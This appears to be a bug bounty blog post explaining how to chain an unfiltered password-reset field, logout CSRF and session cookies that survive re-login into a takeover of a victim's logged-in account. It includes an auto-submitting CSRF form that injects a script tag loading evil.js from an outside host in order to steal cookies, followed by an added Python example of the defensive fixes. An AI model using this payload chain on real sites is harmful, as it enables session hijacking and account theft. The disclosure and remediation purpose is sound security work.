So, we have a Stored or Reflected XSS in the "Forgot your password" page.
But we cannot carry out the attack on a user, since this is not an XSS inside the user's account. And if we cannot provide the required PoC, this vulnerability poses no threat and cannot claim a greater reward in bug bounties!
However, an XSS outside the personal account is fairly easy to turn into one inside it, and now I'll tell you how to do it.
There is a page http://example.com/rememberpassword
It takes a POST request, and there is no filtering of the email field:
POST /rememberpassword HTTP/1.1
Accept-Encoding: gzip, deflate
In general, our task is to lure the victim to http://example.com/rememberpassword, run our code and steal her cookies. But this will not work if the victim is logged into her account.
And here two vulnerabilities help us.
The first vulnerability: LOGOUT CSRF.
1) The vulnerability lies in the fact that you can LOG OUT the victim without her consent: if she visits http://example.com/en/account?option=logout, she is logged out of her account.
To prevent this, every logout link should carry a unique CSRF token, as in the social network https://login.vk.com/?act=logout&hash=8b8bcf7f3cbd6d32d5&_origin=https://vk.com .
2) The second vulnerability is broken authentication & session management. It lies in the fact that when the victim logged out of her account and then logged in again, the cookies had not changed! This is dangerous, number 2 in the OWASP Top 10 https://www.owasp.org/index.php/Top_10_2013-Top_10 , and it can be used in exploits together with other bugs. New cookie values must be generated on every new login. We need to test twice: compare the cookies at logout with those after the next login; not a single character will have changed.
Thus the second bug is passive; nothing is done with it directly. With the first one we write our automatic CSRF exploit, loading the logout link from the victim's account in the HTML head as a picture:
<form action="http://example.com/rememberpassword" method="POST">
<input type="hidden" name="formName" value="rememberpassword" />
<input type="hidden" name="email" value="<script src='http://securityz.net/evil.js'></script>" />
<input type="hidden" name="humanizm[id]" value="d8ac3bdda21255b54bcdd549bb15962c" />
<input type="hidden" name="humanizm[input]" value="" />
<input type="submit" id="qiece" value="Submit request" />
</form>
Well, our exploit is done.
Similar vulnerabilities (Logout CSRF / Broken Authentication) turn up for me everywhere, and with their help, together with an XSS (one that is not in the user's account) and a sniffer, an account can easily be hacked (unless, of course, the cookies are httpOnly).
If you enjoyed this article, follow me on Twitter https://twitter.com/MaximYaremchuk / retweet, and I'll add more articles as I research the security of web applications 🙂
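The two server-side fixes this post calls for (a per-session token on the logout action, and a fresh session cookie on every login) together with the "log in, log out, log in again and compare the cookie" check, as an added example in Python. This is not code from the post or from the site it describes; SessionApp is a constructed toy session store, and rotate=False only reproduces the weak behaviour for comparison.

```python
import hmac
import secrets


class SessionApp:
    """Constructed toy session store. rotate=True is the hardened form;
    rotate=False reproduces the weak behaviour from the post: the same
    cookie value survives a logout, and logout needs no token."""

    def __init__(self, rotate=True):
        self.rotate = rotate
        self.sessions = {}   # cookie value -> {"user": ..., "csrf": ...}
        self._sticky = {}    # weak mode: one fixed cookie value per user

    def login(self, user, old_cookie=None):
        if self.rotate:
            # Fresh, unguessable session id on every authentication (bug 2 fixed).
            cookie = secrets.token_urlsafe(32)
        else:
            cookie = self._sticky.setdefault(user, secrets.token_urlsafe(32))
        self.sessions.pop(old_cookie, None)   # old id is never valid again
        self.sessions[cookie] = {"user": user, "csrf": secrets.token_urlsafe(16)}
        return cookie

    def logout(self, cookie, token=None):
        """Logout only succeeds with the per-session CSRF token, so a
        cross-site <img> or <form> cannot force it (bug 1 fixed)."""
        sess = self.sessions.get(cookie)
        if sess is None:
            return False
        if self.rotate and (token is None or
                            not hmac.compare_digest(token, sess["csrf"])):
            return False
        del self.sessions[cookie]
        return True


def session_rotates(app):
    """The post's check: log in, log out, log in again, then compare the
    cookie values character by character. Returns True when they differ."""
    c1 = app.login("alice")
    if not app.logout(c1, app.sessions[c1]["csrf"]):
        raise RuntimeError("logout with a valid token must succeed")
    c2 = app.login("alice", old_cookie=c1)
    return c1 != c2


def logout_needs_token(app):
    """True when a logout request without the token is rejected."""
    return app.logout(app.login("bob")) is False
```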
#bugbounty #xss #BrokenAuthentication